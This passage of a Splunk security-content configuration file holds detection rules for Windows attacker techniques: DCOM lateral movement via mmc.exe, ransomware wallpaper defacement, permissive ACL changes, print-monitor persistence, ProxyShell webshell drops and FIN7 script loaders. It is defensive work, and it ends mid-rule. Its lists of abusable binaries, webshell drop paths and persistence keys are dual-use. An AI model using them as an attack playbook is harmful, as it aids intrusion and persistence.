description = The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the DCOM protocol and the MMC20 COM object, the executed command is spawned as a child process of `mmc.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of mmc.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003", "T1218.014"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the DCOM protocol and the MMC20 COM object, the executed command is spawned as a child process of `mmc.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of mmc.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Legitimate applications may trigger this behavior; filter as needed.
action.escu.creation_date = 2021-11-23
action.escu.modification_date = 2021-11-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Mmc LOLBAS Execution Process Spawn - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = Mmc.exe spawned a LOLBAS process on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Mmc LOLBAS Execution Process Spawn - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003", "T1218.014"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the DCOM protocol and the MMC20 COM object, the executed command is spawned as a child process of `mmc.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of mmc.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.
action.notable.param.rule_title = Mmc LOLBAS Execution Process Spawn
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=mmc.exe) (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe", "Rasautou.exe", "Schtasks.exe", "Xwizard.exe", "Dllhost.exe", "Pnputil.exe", "Atbroker.exe", "Pcwrun.exe", "Ttdinject.exe","Mshta.exe", "Bitsadmin.exe", "Certoc.exe", "Ieexec.exe", "Microsoft.Workflow.Compiler.exe", "Runscripthelper.exe", "Forfiles.exe", "Msbuild.exe", "Register-cimprovider.exe", "Tttracer.exe", "Ie4uinit.exe", "Bash.exe", "Hh.exe", "SettingSyncHost.exe", "Cmstp.exe", "Mmc.exe", "Stordiag.exe", "Scriptrunner.exe", "Odbcconf.exe", "Extexport.exe", "Msdt.exe", "WorkFolders.exe", "Diskshadow.exe", "Mavinject.exe", "Regasm.exe", "Gpscript.exe", "Rundll32.exe", "Regsvr32.exe", "Msiexec.exe", "Wuauclt.exe", "Presentationhost.exe", "Wmic.exe", "Runonce.exe", "Syncappvpublishingserver.exe", "Verclsid.exe", "Infdefaultinstall.exe", "Explorer.exe", "Installutil.exe", "Netsh.exe", "Wab.exe", "Dnscmd.exe", "At.exe", "Pcalua.exe", "Msconfig.exe")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mmc_lolbas_execution_process_spawn_filter`

[ESCU - Modification Of Wallpaper - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies suspicious modification of the registry to deface or change the wallpaper of a compromised machine as part of its payload. This technique was commonly seen in ransomware like REVIL, which creates a bitmap file containing a note that the machine was compromised and sets it as the wallpaper.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies suspicious modification of the registry to deface or change the wallpaper of a compromised machine as part of its payload. This technique was commonly seen in ransomware like REVIL, which creates a bitmap file containing a note that the machine was compromised and sets it as the wallpaper.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Image, the TargetObject registry key, and the registry Details from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = A third-party tool may be used to change the wallpaper of the machine.
action.escu.creation_date = 2021-06-02
action.escu.modification_date = 2021-06-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Modification Of Wallpaper - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "BlackMatter Ransomware", "Windows Registry Abuse", "Brute Ratel C4", "LockBit Ransomware", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = Wallpaper modification on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Modification Of Wallpaper - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "BlackMatter Ransomware", "Windows Registry Abuse", "Brute Ratel C4", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies suspicious modification of the registry to deface or change the wallpaper of a compromised machine as part of its payload. This technique was commonly seen in ransomware like REVIL, which creates a bitmap file containing a note that the machine was compromised and sets it as the wallpaper.
action.notable.param.rule_title = Modification Of Wallpaper
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode =13 (TargetObject IN ("*\\Control Panel\\Desktop\\Wallpaper","*\\Control Panel\\Desktop\\WallpaperStyle") AND Image != "*\\explorer.exe") OR (TargetObject IN ("*\\Control Panel\\Desktop\\Wallpaper","*\\Control Panel\\Desktop\\WallpaperStyle") AND Details IN ("*\\temp\\*", "*\\users\\public\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Image TargetObject Details Computer process_guid process_id user_id | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `modification_of_wallpaper_filter`

[ESCU - Modify ACL permission To Files Or Folder - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies suspicious modification of ACL permissions on a file or folder to make it available to everyone. This technique may be used by an adversary to evade ACLs or access protected files. This change is commonly configured by the file or directory owner with appropriate permission. This behavior is a good indicator if this command is seen on a machine used by an account with no permission to do so.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic identifies suspicious modification of ACL permissions on a file or folder to make it available to everyone. This technique may be used by an adversary to evade ACLs or access protected files. This change is commonly configured by the file or directory owner with appropriate permission. This behavior is a good indicator if this command is seen on a machine used by an account with no permission to do so.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may use this command. Filter as needed.
action.escu.creation_date = 2022-03-17 action.escu.modification_date = 2022-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Modify ACL permission To Files Or Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig"] action.risk = 1 action.risk.param._risk_message = Suspicious ACL permission modification on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 32}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Modify ACL permission To Files Or Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "cacls.exe" OR Processes.process_name = "icacls.exe" OR Processes.process_name = "xcacls.exe") AND Processes.process = "*/G*" AND (Processes.process = "* everyone:*" OR Processes.process = "* SYSTEM:*" OR Processes.process = "* S-1-1-0:*") by Processes.parent_process_name Processes.process_name Processes.dest Processes.user | 
`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `modify_acl_permission_to_files_or_folder_filter` [ESCU - Monitor Registry Keys for Print Monitors - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.010", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = You will encounter noise from legitimate print-monitor registry entries. 
action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Monitor Registry Keys for Print Monitors - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = New print monitor added on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Monitor Registry Keys for Print Monitors - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.010", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot. 
action.notable.param.rule_title = Monitor Registry Keys for Print Monitors action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.action=modified AND Registry.registry_path="*CurrentControlSet\\Control\\Print\\Monitors*") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `monitor_registry_keys_for_print_monitors_filter` [ESCU - MS Exchange Mailbox Replication service writing Active Server Pages - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following query identifies suspicious .aspx files created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to the HAFNIUM group and the recently disclosed vulnerability named ProxyShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. The analytic is limited to process name MSExchangeMailboxReplication.exe, which typically does not write .aspx files to disk. Upon triage, the suspicious .aspx file will likely look obvious on the surface. Inspect the contents for script code inside. 
Identify additional log sources, IIS included, to review the source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically, analytics to detect those threats are written without the benefit of being able to target only those systems. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case of the ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the Exchange server is communicating with new systems that it has not communicated with previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise, allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following query identifies suspicious .aspx files created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to the HAFNIUM group and the recently disclosed vulnerability named ProxyShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. The analytic is limited to process name MSExchangeMailboxReplication.exe, which typically does not write .aspx files to disk. Upon triage, the suspicious .aspx file will likely look obvious on the surface. Inspect the contents for script code inside. 
Identify additional log sources, IIS included, to review the source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically, analytics to detect those threats are written without the benefit of being able to target only those systems. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case of the ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the Exchange server is communicating with new systems that it has not communicated with previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise, allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.how_to_implement = To successfully implement this search you need to be ingesting process information that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node. action.escu.known_false_positives = The query is structured in a way that `action` (read, create) is not defined. Review the results of this query, filter, and tune as necessary. It may be necessary to generate this query specific to your endpoint product. 
action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - MS Exchange Mailbox Replication service writing Active Server Pages - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ProxyShell", "Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A file, $file_name$, related to IIS exploitation via ProxyShell was written to disk. Review further file modifications on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - MS Exchange Mailbox Replication service writing Active Server Pages - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyShell", "Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following query identifies suspicious .aspx files created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to the HAFNIUM group and the recently disclosed 
vulnerability named ProxyShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. The analytic is limited to process name MSExchangeMailboxReplication.exe, which typically does not write .aspx files to disk. Upon triage, the suspicious .aspx file will likely look obvious on the surface. Inspect the contents for script code inside. Identify additional log sources, IIS included, to review the source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically, analytics to detect those threats are written without the benefit of being able to target only those systems. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case of the ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the Exchange server is communicating with new systems that it has not communicated with previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise, allowing the hunter to focus only on the systems where this behavioral change is relevant. 
action.notable.param.rule_title = MS Exchange Mailbox Replication service writing Active Server Pages action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=MSExchangeMailboxReplication.exe by _time span=1h Processes.process_id Processes.process_name Processes.process_guid Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\HttpProxy\\owa\\auth\\*", "*\\inetpub\\wwwroot\\aspnet_client\\*", "*\\HttpProxy\\OAB\\*") Filesystem.file_name="*.aspx" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process process_guid] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `ms_exchange_mailbox_replication_service_writing_active_server_pages_filter` [ESCU - MS Scripting Process Loading Ldap Module - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicious MS scripting process, such as wscript.exe or cscript.exe, loading an LDAP module to process an LDAP query. This behavior was seen in a FIN7 implant that uses JavaScript to execute an LDAP query to parse host information, which it then sends to its C2 server. 
This anomaly detection is a good initial step for hunting further suspicious LDAP queries or LDAP-related events on the host, which may give you useful information about LDAP or AD information processing, or may reveal an attacker. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects a suspicious MS scripting process, such as wscript.exe or cscript.exe, loading an LDAP module to process an LDAP query. This behavior was seen in a FIN7 implant that uses JavaScript to execute an LDAP query to parse host information, which it then sends to its C2 server. This anomaly detection is a good initial step for hunting further suspicious LDAP queries or LDAP-related events on the host, which may give you useful information about LDAP or AD information processing, or may reveal an attacker. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = Automation scripting languages may be used by network operators to perform LDAP queries. 
action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - MS Scripting Process Loading Ldap Module - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["FIN7"] action.risk = 1 action.risk.param._risk_message = $process_name$ loading ldap modules $ImageLoaded$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MS Scripting Process Loading Ldap Module - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode =7 Image IN ("*\\wscript.exe", "*\\cscript.exe") ImageLoaded IN ("*\\Wldap32.dll", "*\\adsldp.dll", "*\\adsldpc.dll") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_ldap_module_filter` [ESCU - MS Scripting Process Loading WMI Module - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicious MS scripting process, such as wscript.exe or cscript.exe, loading a WMI module to 
process a WMI query. This behavior was seen in a FIN7 implant that uses JavaScript to execute a WMI query to parse host information, which it then sends to its C2 server. This anomaly detection is a good initial step for hunting further suspicious WMI queries or WMI-related events on the host, which may give you useful information about processes that commonly use WMI queries or modules, or may reveal an attacker using this technique. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects a suspicious MS scripting process, such as wscript.exe or cscript.exe, loading a WMI module to process a WMI query. This behavior was seen in a FIN7 implant that uses JavaScript to execute a WMI query to parse host information, which it then sends to its C2 server. This anomaly detection is a good initial step for hunting further suspicious WMI queries or WMI-related events on the host, which may give you useful information about processes that commonly use WMI queries or modules, or may reveal an attacker using this technique. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = Automation scripting languages may be used by network operators to perform LDAP queries. 
action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - MS Scripting Process Loading WMI Module - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["FIN7"] action.risk = 1 action.risk.param._risk_message = $process_name$ loading wmi modules $ImageLoaded$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MS Scripting Process Loading WMI Module - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode =7 Image IN ("*\\wscript.exe", "*\\cscript.exe") ImageLoaded IN ("*\\fastprox.dll", "*\\wbemdisp.dll", "*\\wbemprox.dll", "*\\wbemsvc.dll" , "*\\wmiutils.dll", "*\\wbemcomn.dll") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_wmi_module_filter` [ESCU - MSBuild Suspicious Spawned By Script Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious child process of 
MSBuild spawned by Windows Script Host (cscript or wscript). This behavior is commonly seen and used by malware or adversaries to execute a malicious MSBuild process via a malicious script on the compromised host. During triage, review parallel processes and identify any file modifications. MSBuild may load a script from the same path without having command-line arguments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127.001", "T1127"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic detects a suspicious MSBuild child process spawned by Windows Script Host (cscript or wscript). This behavior is commonly seen and used by malware or adversaries to execute a malicious MSBuild process via a malicious script on the compromised host. During triage, review parallel processes and identify any file modifications. MSBuild may load a script from the same path without having command-line arguments. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as developers do not spawn MSBuild via a WSH. 
action.escu.creation_date = 2021-10-04 action.escu.modification_date = 2021-10-04 action.escu.confidence = high action.escu.full_search_name = ESCU - MSBuild Suspicious Spawned By Script Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild"] action.risk = 1 action.risk.param._risk_message = Msbuild.exe process spawned by $parent_process_name$ on $dest$ executed by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MSBuild Suspicious Spawned By Script Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild"], "cis20": ["CIS 